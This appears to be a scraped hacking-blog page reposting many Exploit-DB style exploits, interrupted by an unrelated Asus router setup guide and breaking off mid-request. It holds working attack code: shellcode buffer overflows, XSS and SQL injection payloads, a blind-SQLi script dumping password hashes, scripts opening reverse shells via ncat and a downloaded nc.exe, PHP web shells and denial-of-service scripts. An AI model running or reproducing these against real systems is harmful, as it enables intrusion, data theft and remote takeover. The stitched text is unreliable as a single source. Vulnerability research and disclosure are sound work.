# Exploit Title: KiteService 1.2020.618.0 - Unquoted Service Path
# Discovery by: PoisonSk
# Discovery Date: 2020-06-23
# Vendor Homepage: https://www.kite.com/
# Software Link : https://www.kite.com/download/
# Tested Version: 1.2020.618.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Home Single 10.0.18363 N/D Compilación 18363
# Steps to discover unquoted Service Path:
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i "program " | findstr /i /v """
KiteService KiteService C:\Program Files\Kite\KiteService.exe Auto
C:\Users>sc qc KiteService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: KiteService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : KiteService
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# Exploit:
#A successful attempt would require the local attacker must insert an executable file in the path of the service.
#Upon service restart or system reboot, the malicious code will be run with elevated privileges.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863178338
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-29
# Vulnerable Software: RM Downloader
# Software Link Download: https://github.com/x00x00x00x00/RMDownloader_2.50.60/raw/master/RMDownloader.exe
# Version: 2.50.60 2006.06.23
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
# Proof of Concept:
# 1.- Run the python script, it will create a new file "RM_LCE.txt"
# 2.- Copy the content of the new file 'RM_LCE.txt' to clipboard
# 3.- Turn off DEP for RMDownloader.exe
# 4.- Open 'RMDownloader.exe'
# 5.- Go to 'Load' tab
# 6.- Paste clipboard in 'Load' parameter
# 7.- Click on button 'OK'
# 8.- Two messageboxes will pop up, click OK
# 9.- Calc.exe runs.
#################################################################################################################################################
#Python "RM_LCE.py" Code:
f= open("RM_LCE.txt", "w")
junk="\x41" * 336
egg = "w00tw00t"
# msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -b "\x0a\x0d\x00"
buf = ""
buf += "\xd9\xeb\xb8\xfa\x38\xad\x4f\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xee\xda"
buf += "\x58\xb3\xe6\x99\xa3\x4c\xf6\xfd\x2a\xa9\xc7\x3d\x48"
buf += "\xb9\x77\x8e\x1a\xef\x7b\x65\x4e\x04\x08\x0b\x47\x2b"
buf += "\xb9\xa6\xb1\x02\x3a\x9a\x82\x05\xb8\xe1\xd6\xe5\x81"
buf += "\x29\x2b\xe7\xc6\x54\xc6\xb5\x9f\x13\x75\x2a\x94\x6e"
buf += "\x46\xc1\xe6\x7f\xce\x36\xbe\x7e\xff\xe8\xb5\xd8\xdf"
buf += "\x0b\x1a\x51\x56\x14\x7f\x5c\x20\xaf\x4b\x2a\xb3\x79"
buf += "\x82\xd3\x18\x44\x2b\x26\x60\x80\x8b\xd9\x17\xf8\xe8"
buf += "\x64\x20\x3f\x93\xb2\xa5\xa4\x33\x30\x1d\x01\xc2\x95"
buf += "\xf8\xc2\xc8\x52\x8e\x8d\xcc\x65\x43\xa6\xe8\xee\x62"
buf += "\x69\x79\xb4\x40\xad\x22\x6e\xe8\xf4\x8e\xc1\x15\xe6"
buf += "\x71\xbd\xb3\x6c\x9f\xaa\xc9\x2e\xf5\x2d\x5f\x55\xbb"
buf += "\x2e\x5f\x56\xeb\x46\x6e\xdd\x64\x10\x6f\x34\xc1\xee"
buf += "\x25\x15\x63\x67\xe0\xcf\x36\xea\x13\x3a\x74\x13\x90"
buf += "\xcf\x04\xe0\x88\xa5\x01\xac\x0e\x55\x7b\xbd\xfa\x59"
buf += "\x28\xbe\x2e\x3a\xaf\x2c\xb2\x93\x4a\xd5\x51\xec"
nseh ="\xeb\x06\x90\x90"
#1002C531 5B POP EBX
#1002C532 58 POP EAX
#1002C533 C3 RETN
#C:\Program Files\RM Downloader\RDutility02.dll
seh="\x31\xc5\x02\x10"
nops="\x90" * 20
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
egghunter += "\x77\x30\x30\x74" # this is the marker/tag: w00t
egghunter += "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
payload = junk + egg + buf + nseh + seh + nops + egghunter
f.write(payload)
f.close
# Exploit Title: Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-06-28
# Exploit Author: Anushree Priyadarshini
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link:https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10
# CVE: CVE-2020-15599
Description: The form parameter 'user_firstname' and 'user_lastname' is vulnerable to stored cross site scripting
Payload for 'user_firstname' : <script>alert(1)</script>
Payload for 'user_lastname' : <script>alert(2)</script>
POST /CMSsite-master/register.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9,en-GB;q=0.8,en-CA;q=0.7,zh-CN;q=0.6,zh-HK;q=0.5,zh-SG;q=0.4,zh-TW;q=0.3,ja;q=0.2,ko;q=0.1
Accept-Encoding: gzip, deflate
Referer: http://localhost/CMSsite-master/register.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
Connection: close
Cookie: PHPSESSID=491d4jir62vldd0u84knd1m1fi
Upgrade-Insecure-Requests: 1
user_name=DemoUser&user_firstname=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&user_lastname=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&user_email=Hack%40gmail.com&user_password=1234®ister=
# Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection
# Date: 2020-06-28
# Google Dork: "Copyright 2020 Reside Property Management"
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
# Team Members: Behzad Khalifeh , Milad Ranjbar
# Vendor Homepage: https://www.13plugins.com/product/reside-v3-rental-property-management-php-script/
# Version: v3.0 [Final Version]
# Tested on: Windows/Linux
# CVE: N/A
.:: Description ::.
RESIDE makes it easy to manage all of your tenants & properties, record payments, and keep everything accessible any time, from any computer or device.
.:: Vulnerable File ::.
profile.php
.:: Vulnerable Code ::.
- Line 21: $profile = $_GET['profile'];
- Line 22: $adminsName = preg_replace('/-/', ' ', $profile);
- Line 90: $sql = "SELECT * FROM admins WHERE adminName = '" . $adminsName . "'";
- Line 91: mysqli_query $result = mysqli_query($mysqli, $sql) or die ('-1' . mysqli_error());
.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target With the above Dork.
Step 2 - Find profile.php File in Target
Step 3 - Inject Your Payloads in profile parameter
.:: Sample Request ::.
localhost/reside-rental-property-management/Reside/profile.php?profile=-21%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26%23
In the previous article, my cousin talked about installing alist in the pandb firmware. In this article, I will introduce to you how to configure the ipv6+alist+gdns configuration of the official firmware of Asus router.
Experimental Environment
Asus router (official firmware) install alist install DDNS-GO to enable IPv6 access
Configure ipv6
First use the super administrator password to log in to the optical cat, and set the network mode to bridge mode 
Then, log in to the router and set the Internet access method to pppoe. Configure an Internet account and ensure that you can access the Internet normally.
Configure ipv6. When saving normal Internet access, click the ipv6 tab on the left. Set the Internet access method to Native.
After saving, pass test-ipv6.com.
Installing alist
alist installation is in the previous article, we have already talked about it.
First, determine the router's architecture through uname -a. Asus routers are also based on musl. For example, my router uses the alist-linux-musl-arm.tar.gz package.
./alist server #Start the service
./alist admin #View the initial password For convenience, we can add it after the command and let it run in the background! like
./alist server # Run in the background and then visit http://192.168.50.1:5244 to access the login page of alist.
Installing ddsn-go
Similarly, you can refer to my previous article. However, it should be noted that Asus router cannot be installed by installing the server. That is to say, after each restart of the router, you need to manually start ddns-go.
According to the router system architecture, download ddns-go and run it in the background.
./ddns-go # Run ddns-go in the background and access http://192.168.50.1:9876. Test 
Confirm ipv6 address
We log in to the router and execute the ifconfig command to view the router's own ipv6 address. Or just use ddns. We choose ppp0 
for network card
Next, we need to configure the parameters for Alibaba Cloud domain name resolution, so I won’t talk about it here.
Configure the firewall
After all configurations, you will find that only intranet devices can access it, but external devices cannot access it. We need to manually turn on the firewall. Note: The router itself has a firewall configuration, but I have tested it several times, but it still cannot be accessed from the external network. The following is my configuration. I don’t know why, so I’ll give you advice if you know it!
When the system firewall configuration was fruitless, I manually turned on the firewall. The command is as follows:
ip6tables -I INPUT -i ppp0 -p tcp -m tcp --dport 5244 -j ACCEPT #Open alist 5244 port
ip6tables -I INPUT -i ppp0 -p tcp -m tcp --dport 9876 -j ACCEPT #Open ddns-go port
ip6tables -I INPUT -i ppp0 -p tcp -m tcp --dport 22 -j ACCEPT #After opening the 22 port configuration is completed, we can directly access the device through the resolved domain name on the external network.
For convenience, I wrote a startup script
#!/bin/sh
#Start alist
cd /tmp/mnt/ASUS/tool
nohup ./alist server
#Start ddns-go
nohup ./ddns-go
ip6tables -I INPUT -i ppp0 -p tcp -m tcp --dport 5244 -j ACCEPT
ip6tables -I INPUT -i ppp0 -p tcp -m tcp --dport 9876 -j ACCEPT
ip6tables -I INPUT -i ppp0 -p tcp -m tcp --dport 22 -j ACCEPT When we restart the router, we can directly run the script to start alist
Of course, don't worry too much about the load on the router. Very low!
There is a problem
At present, the startup script of Asus' official firmware is being studied and has not been resolved yet. After restarting the router, you need to manually start the script directly.
# Exploit Title: e-learning Php Script 0.1.0 - 'search' SQL Injection
# Date: 2020-06-29
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
# Software Link: https://github.com/amitkolloldey/elearning-script
# Version: 0.1.0
# Tested on: Kali Linux
Source code(search.php):
<?php
if(isset($_GET['search_submit'])){
$search_key = $_GET['search'];
$search = "select * from posts where post_keywords
like '%$search_key%'";
$run_search = mysqli_query($con,$search);
$count = mysqli_num_rows($run_search);
if($count == 0){
echo "<h2>No Result Found.Please Try With Another
Keywords.</h2>";
}else{
while($search_row =
mysqli_fetch_array($run_search)):
$post_id = $search_row ['post_id'];
$post_title = $search_row ['post_title'];
$post_date = $search_row ['post_date'];
$post_author = $search_row ['post_author'];
$post_featured_image = $search_row ['post_image'];
$post_keywords = $search_row ['post_keywords'];
$post_content = substr($search_row
['post_content'],0,200);
?>
Payload:
http://127.0.0.1/e/search.php?search=a&search_submit=Search
http://127.0.0.1/e/search.php?search=a'OR (SELECT 3475
FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT
(ELT(3475=3475,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsDG&search_submit=Search
# Exploit Title: PHP-Fusion 9.03.60 - PHP Object Injection
# Date: 2020-05-26
# Exploit Author: coiffeur
# Vendor Homepage: https://www.php-fusion.co.uk/home.php
# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php
# Version: v9.03.60
# Description:
# PHP Object Injection to SQL injection (pre-auth)
import sys
import requests
import subprocess
GENERATOR_NAME = "gen.php"
GENERATOR_CONTENT = """<?php
if (count($argv) < 2) {
echo 'Usage: php gen.php "<PAYLOAD>"';
die;
}
$ar["comment_item_id"] = "1";
$ar["comment_item_type"] = $argv[1];
$payload = urlencode(base64_encode(serialize($ar)));
echo $payload;
?>
"""
DEBUG = 1
DELTA = None
TRESHOLD = 0.60
LIKE = "f%admin"
COLUMNS = ["user_id", "user_name", "user_algo", "user_salt", "user_password",
"user_admin_algo", "user_admin_salt", "user_admin_password", "user_email"]
def usage():
banner = """NAME: PHPFusion v9.03.50, PHP Object Injection to SQL injection
SYNOPSIS: python poi_to_sqli_9.03.50.py <URL>
DESCRIPTION:
Dump the content of the table named fusionX...X_users
AUTHOR: coiffeur
"""
print(banner)
def generator(action):
if action == "w":
with open(GENERATOR_NAME, "w") as f:
f.write(GENERATOR_CONTENT)
if action == "r":
_ = subprocess.Popen(["rm", GENERATOR_NAME], stdout=subprocess.PIPE)
def generate_payload(text):
p = subprocess.Popen(["php", GENERATOR_NAME, text], stdout=subprocess.PIPE)
out, _ = p.communicate()
return out
def check(payload):
datas = {"comment_options": generate_payload(payload)}
r = requests.post(
url=f"{sys.argv[1]}/includes/classes/PHPFusion/Feedback/Comments.ajax.php", data=datas)
return r.elapsed.total_seconds()
def evaluate_delay():
global DELTA
deltas = []
payload = "' UNION SELECT SLEEP(2)-- - '"
for _ in range(3):
deltas.append(check(payload))
DELTA = sum(deltas)/len(deltas)
def get_tbl_name_len():
i = 0
while 1:
payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<{i} THEN SLEEP(2) ELSE 0 END) -- - '"
if check(payload) >= DELTA*TRESHOLD:
return i-1
if i > 100:
print(f"[x] Exploit failed")
exit(-1)
i += 1
def get_tbl_name(length):
tbl_name = ""
for i in range(1, length+1):
min, max = 0, 127-1
while min < max:
mid = (max + min) // 2
payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR(table_name,{i},1)) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '"
if check(payload) >= DELTA*TRESHOLD:
max = mid
else:
min = mid + 1
tbl_name += chr(min)
if DEBUG:
print(f"[DEBUG] Table name: {tbl_name}")
return tbl_name
def get_rows_number(tbl_name):
i = 0
while 1:
payload = f"' UNION SELECT (CASE WHEN (SELECT COUNT(user_name) FROM {tbl_name})>{i} THEN 0 ELSE SLEEP(2) END) -- - '"
if check(payload) >= DELTA*TRESHOLD:
return i
i += 1
def get_elt_len(tbl_name, column_name, offset):
i = 0
while 1:
payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH({column_name}) FROM {tbl_name} LIMIT 1 OFFSET {offset})<{i} THEN SLEEP(2) ELSE 0 END) -- - '"
if check(payload) >= DELTA*TRESHOLD:
if DEBUG:
print(
f"[DEBUG] Element {offset} in {column_name} from {tbl_name} length: {i-1}")
return i-1
i += 1
def get_elt(tbl_name, column_name, offset, length):
elt = ""
for i in range(1, length+1):
min, max = 0, 127-1
while min < max:
mid = (max + min) // 2
payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR({column_name},{i},1)) FROM {tbl_name} LIMIT 1 OFFSET {offset} )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '"
if check(payload) >= DELTA*TRESHOLD:
max = mid
else:
min = mid + 1
elt += chr(min)
if DEBUG:
print(
f"[DEBUG] Element {offset} in {column_name} from {tbl_name}: {elt}")
print(f"[*] Element {offset} in {column_name} from {tbl_name}: {elt}")
return elt
def get_rows(tbl_name, row_number):
print(f"[*] Trying to dump {tbl_name}")
rows = []
for offset in range(row_number):
row = []
for column_name in COLUMNS:
elt_length = get_elt_len(tbl_name, column_name, offset)
row.append(get_elt(tbl_name, column_name, offset, elt_length))
print(f"[*] Row {offset}: {row}")
rows.append(row)
print(f"[*] Rows: {rows}")
def main():
if len(sys.argv) < 2:
print(usage())
exit(-1)
if DEBUG:
print(f"[*] Target: {sys.argv[1]}")
if DEBUG:
print(f"[DEBUG] Writting generator to {GENERATOR_NAME}")
generator("w")
evaluate_delay()
if DEBUG:
print(f"[*] Delta: {DELTA}")
tbl_name_len = get_tbl_name_len()
if DEBUG:
print(
f"[DEBUG] Looking for table like {LIKE} with length {tbl_name_len}")
tbl_name = get_tbl_name(tbl_name_len)
print(f" Table name: {tbl_name}")
prefix = f"{tbl_name.split('_')[0]}_"
print(f"[*] Prefix: {prefix}")
user_table_name = f"{prefix}users"
number_of_rows = get_rows_number(user_table_name)
if DEBUG:
print(f"[*] {user_table_name} got {number_of_rows} rows")
get_rows(user_table_name, number_of_rows)
if DEBUG:
print(f"[DEBUG] Removing {GENERATOR_NAME}")
generator("r")
if __name__ == "__main__":
main()
# Exploit Title: OCS Inventory NG 2.7 - Remote Code Execution
# Date: 2020-06-05
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-14947
# Vendor Homepage: https://ocsinventory-ng.org/
# Version: v2.7
# Tested on: Ubuntu 18.04 / PHP 7.2.24
#!/usr/bin/python3
import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote
warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')
if len(sys.argv) !=3D 6:
print("[~] Usage : ./ocsng-exploit.py url username password ip port")
exit()
url =3D sys.argv[1]
username =3D sys.argv[2]
password =3D sys.argv[3]
ip =3D sys.argv[4]
port =3D sys.argv[5]
request =3D requests.session()
def login():
login_info =3D {
"Valid_CNX": "Send",
"LOGIN": username,
"PASSWD": password
}
login_request =3D request.post(url+"/index.php", login_info)
login_text =3D login_request.text
if "User not registered" in login_text:
return False
else:
return True
def inject_payload():
csrf_req =3D request.get(url+"/index.php?function=3Dadmin_conf")
content =3D csrf_req.text
soup =3D BeautifulSoup(content, "lxml")
first_token =3D soup.find_all("input", id=3D"CSRF_10")[0].get("value")
print("[+] 1st token : %s" % first_token)
first_data =3D {
"CSRF_10": first_token,
"onglet": "SNMP",
"old_onglet": "INVENTORY"
}
req =3D request.post(url+"/index.php?function=3Dadmin_conf", data=3Dfir=
st_data)
content2 =3D req.text
soup2 =3D BeautifulSoup(content2, "lxml")
second_token =3D soup2.find_all("input", id=3D"CSRF_14")[0].get("value"=
)
print("[+] 2nd token : %s" % second_token)
payload =3D "; ncat -e /bin/bash %s %s #" % (ip, port)
#RELOAD_CONF=3D&Valid=3DUpdate
inject_request =3D {
"CSRF_14": second_token,
"onglet": "SNMP",
"old_onglet": "SNMP",
"SNMP": "0",
"SNMP_INVENTORY_DIFF": "1",
# The payload should be here
"SNMP_MIB_DIRECTORY": payload,
"RELOAD_CONF": "",
"Valid": "Update"
}
final_req =3D request.post(url+"/index.php?function=3Dadmin_conf", data=
=3Dinject_request)
if "Update done" in final_req.text:
print("[+] Payload injected successfully")
execute_payload()
def execute_payload():
csrf_req =3D request.get(url+"/index.php?function=3DSNMP_config")
content =3D csrf_req.text
soup =3D BeautifulSoup(content, "lxml")
third_token =3D soup.find_all("input", id=3D"CSRF_22")[0].get("value")
third_request =3D request.post(url+"/index.php?function=3DSNMP_config",=
files=3D{
'CSRF_22': (None, third_token),
'onglet': (None, 'SNMP_MIB'),
'old_onglet': (None, 'SNMP_RULE'),
'snmp_config_length': (None, '10')
})
print("[+] 3rd token : %s" % third_token)
third_request_text =3D third_request.text
soup =3D BeautifulSoup(third_request_text, "lxml")
forth_token =3D soup.find_all("input", id=3D"CSRF_26")[0].get("value")
print("[+] 4th token : %s" % forth_token)
print("[+] Triggering payload ..")
print("[+] Check your nc ;)")
forth_request =3D request.post(url+"/index.php?function=3DSNMP_config",=
files=3D{
'CSRF_26': (None, forth_token),
'onglet': (None, 'SNMP_MIB'),
'old_onglet': (None, 'SNMP_MIB'),
'update_snmp': (None, 'send')
})
if login():
print("[+] Valid credentials!")
inject_payload()
# Exploit Title: ZenTao Pro 8.8.2 - Command Injection
# Date: 2020-07-01
# Exploit Author: Daniel Monzón & Melvin Boers
# Vendor Homepage: https://www.zentao.pm/
# Version: 8.8.2
# Tested on: Windows 10 / WampServer
# Other versions like pro or enterprise edition could be affected aswell
# Netcat is needed to use this exploit
import requests
import hashlib
import urllib.parse
host = 'http://192.168.223.132'
username = 'admin'
password = 'Test123!@#'
name = 'Test2'
command = 'certutil.exe+-urlcache+-f+-split+http%3A%2F%2F192.168.223.131%2Fnc.exe+C%3A%5Cbad.exe+%26%26'
command2 = 'C:\\bad.exe 192.168.223.131 9001 -e cmd.exe &&'
git_path = 'C%3A%5CProgramData'
x = requests.session() # Create a session, as needed because we need admin rights.
def sign_in(url, username, password):
password = hashlib.md5(password.encode('utf-8')).hexdigest() # We need to md5 encode the password in order to sign in
proxy = {'http':'127.0.0.1:8080', 'https':'127.0.0.1:8080'} # Just for debugging phase
credentials = {'account' : username, 'password' : password} # The credentials we need
path = url + '/zentao/user-login.html' # URL + path
x.post(path, data=credentials, proxies=proxy, verify=False) # Send the post request to sign in
return '[*] We are signed in!'
def go_to_repo(url):
path = url + '/zentao/repo-browse.html'
x.get(path, verify=False)
print('[*] Getting to repo path')
def create_repo(url, name, command):
headers = {'Accept':'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin':'http://192.168.223.132',
'Referer':'http://192.168.223.132/pro/repo-create.html',
'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0',
'Accept-Language':'en-US,en;q=0.5'}
cookies = {'ajax_lastNext':'on',
'windowWidth':'1846',
'windowHeight':'790'}
path = url + '/zentao/repo-create.html'
parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command
x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False)
print('[*] Creating the repo')
def get_shell(url, name, command):
headers = {'Accept':'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin':'http://192.168.223.132',
'Referer':'http://192.168.223.132/pro/repo-create.html',
'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0',
'Accept-Language':'en-US,en;q=0.5'}
cookies = {'ajax_lastNext':'on',
'windowWidth':'1846',
'windowHeight':'790'}
path = url + '/zentao/repo-create.html'
parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command2
x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False)
print('[*] Check your netcat listener!')
def main():
switch = True
if switch:
sign_in(host, username, password)
if switch:
go_to_repo(host)
if switch:
create_repo(host, name, command)
if switch:
get_shell(host, name, command2)
switch = False
if __name__ == "__main__":
main()
# Exploit Title: Online Shopping Portal 3.1 - Authentication Bypass
# Date: 2020-06-25
# Exploit Author: Ümit Yalçın
# Vendor Homepage: https://phpgurukul.com/shopping-portal-free-download/
# Version: 3.1
# Tested on: Windows 10 / WampServer
1- Authentication Bypass
Go to following url!
http://localhost/shopping/admin/
Default admin username is admin, to bypass authentication use sql bypass like '# or ' OR 1=1#
username = admin'#
passwrod = what ever you want
2- Uploading Shell to Remote Code Execution
After bypassed the authentication go to insert-product field
http://localhost/shopping/admin/insert-product.php
after that, upload you shell , as an example
<?php
$exe = shell_exec($_REQUEST['cmd']);
echo $exe;
?>
and go to http://localhost/shopping/admin/productimages/ and all possible folders named with number from 1 like
http://localhost/shopping/admin/productimages/1
http://localhost/shopping/admin/productimages/2
http://localhost/shopping/admin/productimages/3
http://localhost/shopping/admin/productimages/4
http://localhost/shopping/admin/productimages/5
When you find your shell, for example you found at 21
TARGET/shopping/admin/productimages/21/shell.php?cmd=CODE_YOU_WANT_TO_EXECUTE
# Exploit Title: File Management System 1.1 - Persistent Cross-Site Scripting
# Date: 2020-06-30
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://www.sourcecodester.com/download-code?nid=13333&title=File+Management+System+Very+Complete+Using+PHP%2FMySQLi+version+1.1
# Software Link: https://www.sourcecodester.com/download-code?nid=13333&title=File+Management+System+Very+Complete+Using+PHP%2FMySQLi+version+1.1
# Version: 0.1.0
# Tested on: Kali Linux
Source code(view_admin.php.php):
<?php
require_once("include/connection.php");
$query="SELECT * FROM admin_login";
$result=mysqli_query($conn,$query);
while($rs=mysqli_fetch_array($result)){
$id = $rs['id'];
$fname=$rs['name'];
$admin=$rs['admin_user'];
$pass=$rs['admin_password'];
$status=$rs['admin_status'];
?>
<tr>
<td width='10%'><?php echo $fname; ?></td>
<td align='center'><?php echo $admin; ?></td>
<td align='center' width="20%"><?php echo $pass; ?></td>
<td align='center'><?php echo $status; ?></td>
<td align='center'><a href="#modalRegisterFormsss?id=<?php echo
$id;?>">
<i class="fas fa-user-edit" data-toggle="modal"
data-target="#modalRegisterFormsss"></i> </a> | <a
href="delete_admin.php?id=<?php echo htmlentities($rs['id']); ?>"><i
class='far fa-trash-alt'></i></a></td>
</tr>
<?php } ?>
POC:
1. http://192.168.1.58/Private_Dashboard/view_admin.php
2. Add admin click button
3. We write payload in the name section (<script>alert(1);</script>)
4. And view admin click button
5. And our bad payload will be displayed
# Exploit Title: Grafana 7.0.1 - Denial of Service (PoC)
# Date: 2020-05-23
# Exploit Author: mostwanted002
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download
# Version: 3.0.1 - 7.0.1
# Tested on: Linux
# CVE : CVE-2020-13379
#!/bin/bash
if [[ $1 != "" ]]; then
curl -I "${1}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D"
else
echo "Usage: grafana-dos.sh <TARGET>. Example: grafana-dos.sh http://localhost:3000"
fi
# Exploit Title: Fire Web Server 0.1 - Remote Denial of Service (PoC)
# Date: 2020-06-26
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/firewebserver/
# Software Link: https://sourceforge.net/projects/firewebserver/files/
# Version: Pre-Alpha
# Tested on: Windows 7 , Windows Vista
#!/usr/bin/python
import socket,os,sys
if len(sys.argv) < 3:
print "Usage: python fwspa_dos.py targetIP targetPort"
else:
print "[*] Sending evil http request to target"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((sys.argv[1], int(sys.argv[2])))
expl.send("A"*1015)
expl.close()
# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution
# Date: 2020-07-03
# Exploit Author: Enes Özeser
# Vendor Homepage: http://ritecms.com/
# Version: 2.2.1
# Tested on: Linux
# CVE: CVE-2020-23934
1- Go to following url. >> http://(HOST)/cms/
2- Default username and password is admin:admin. We must know login credentials.
3- Go to "Filemanager" and press "Upload file" button.
4- Choose your php web shell script and upload it.
PHP Web Shell Code == <?php system($_GET['cmd']); ?>
5- You can find uploaded file there. >> http://(HOST)/media/(FILE-NAME).php
6- We can execute a command now. >> http://(HOST)/media/(FILE-NAME).php?cmd=id
(( REQUEST ))
GET /media/(FILE-NAME).php?cmd=id HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://(HOST)/cms/index.php?mode=filemanager&directory=media
Connection: close
Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u
Upgrade-Insecure-Requests: 1
(( RESPONSE ))
HTTP/1.1 200 OK
Date: Fri, 06 Jul 2020 20:02:13 GMT
Server: Apache/2.4.43 (Debian)
Content-Length: 14
Connection: close
Content-Type: text/html; charset=UTF-8
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution
# Date: 2019-04-16
# Exploit Author: Jakub Palaczynski, Lukasz Plonka
# Vendor Homepage: https://www.rsa.com/
# Version: 7.1.1, prior to P02
# CVE : CVE-2019-3759
# (all vulnerable versions can be found at https://www.dell.com/support/security/pl-pl/details/DOC-106943/DSA-2019-134-RSA-Identity-Governance-and-Lifecycle-Product-Security-Update-for-Multiple-Vulnerabi)
Information:
Authenticated users can bypass authorization and get full access to Workpoint Architect module. This module gives possibility to run Groovy scripts which results in Code Execution.
1. First user needs to learn username and password for Architect (different from Aveksa login). Sample request:
https://AVEKSA_HOST/aveksa/main?Oid=193783&ReqType=GetPartial&PageID=ChangeRequestJobPageData&WFObjectID=1%3AWPDS&crID=193783&isAjax=false
search for "<IFRAME" in source of HTML and note username and password
2. Log into Architect. Sample request:
POST /aveksaWFArchitect/auth/login/ HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 146
Cookie: JSESSIONID=session
Connection: close
{"user":"USERNAME","password":"PASSWORD","dsn":"WPDS","product":{"name":"wp-architect","version":"4.40.16"}}
3. Creating new script that bypasses Java Security Policy and runs "id" system command.
* "statementText" - contains base64-encoded Groovy code
* "name" (at the end) - script name that must be unique
* Save "scriptId" from the response as it is necessary for next request.
POST /aveksaWFArchitect/scripts/?refresh=true&replace=false&checkSyntax=false&saveWithRollbackVersion=false HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 733
Cookie: JSESSIONID=session
Connection: close
